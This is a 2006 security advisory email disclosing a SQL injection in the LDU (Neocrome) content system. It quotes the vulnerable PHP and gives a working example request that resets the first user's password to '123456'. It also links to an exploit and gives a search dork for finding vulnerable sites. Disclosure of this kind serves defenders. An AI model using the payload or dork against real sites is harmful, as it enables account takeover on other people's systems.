Date: Tue, 21 Nov 2006 23:03:56 -0600
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com.>
To: [email protected], [email protected],
Subject: Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-9;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.1)
X-Virus-Scanned: antivirus-gw at tyumen.ru
--Security Report--
Advisory: LDU <=3D 8.x Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/10/06 09:44 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
---
Vendor: Neocrome (http://www.neocrome.net)
Version: 8.x also prior versions must be affected.
About: Via this methods remote attacker can manipulate SQL query and =20
change everything in LDU's user database.Vulnerable code can be found =20
in profile.inc.php at lines 142-150
-Source in system/core/profile/profile.inc.php-
142: case 'avatarselect':
143: /* =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D */
144:
145: ldu_check_xg();
146: $avatar =3D $cfg['av_dir'].urldecode($id);
147: if (file_exists($avatar))
148: { $sql =3D ldu_query("UPDATE $db_users SET user_avatar=3D'$avatar' =20
WHERE user_id=3D'".$usr['id']."'"); }
149:
150: break;
-End of source-
As you can see "id" parameter did not sanitized properly and used with =20
urldecode() function which decodes id's value so remote attacker can =20
bypass magic_quotes_gpc and other functions which escapes ' strings.In =20
avatarselect LDU checks files available with file_exists function and =20
urldecode help us by using null byte.
A demostration exploitation will be given in How&Example part.
Level: Highly Critical
---
How&Example:
GET -> =20
http://www.victim.com/users.php?m=3Dprofile&a=3Davatarselect&x=3DXVALUE&id=
=3Ddefault.gif[SQL =20
Inject]
GET -> =20
http://www.victim.com/users.php?m=3Dprofile&a=3Davatarselect&x=3D011A99&id=
=3Ddefault.gif%2500%2527,user_password=3D%2527e10adc3949ba59abbe56e057f20f88=
3e%2527/**/where/**/user_id=3D1/* with this example remote attacker changes =
password of 1st user of LDU to =20
123456
The XVALUE comes with your avatarselect link it's special to everyuser in LD=
U.
For using this vulnerability you must be logged in to LDU...
Timeline:
* 21/10/2006: Vulnerability found.
* 21/10/2006: Contacted with vendor and waiting reply.
---
Original advisory: http://www.nukedx.com/?viewdoc=3D51
---
Exploit:
http://www.nukedx.com/?getxpl=3D51
---
Dorks: "Powered by LDU"
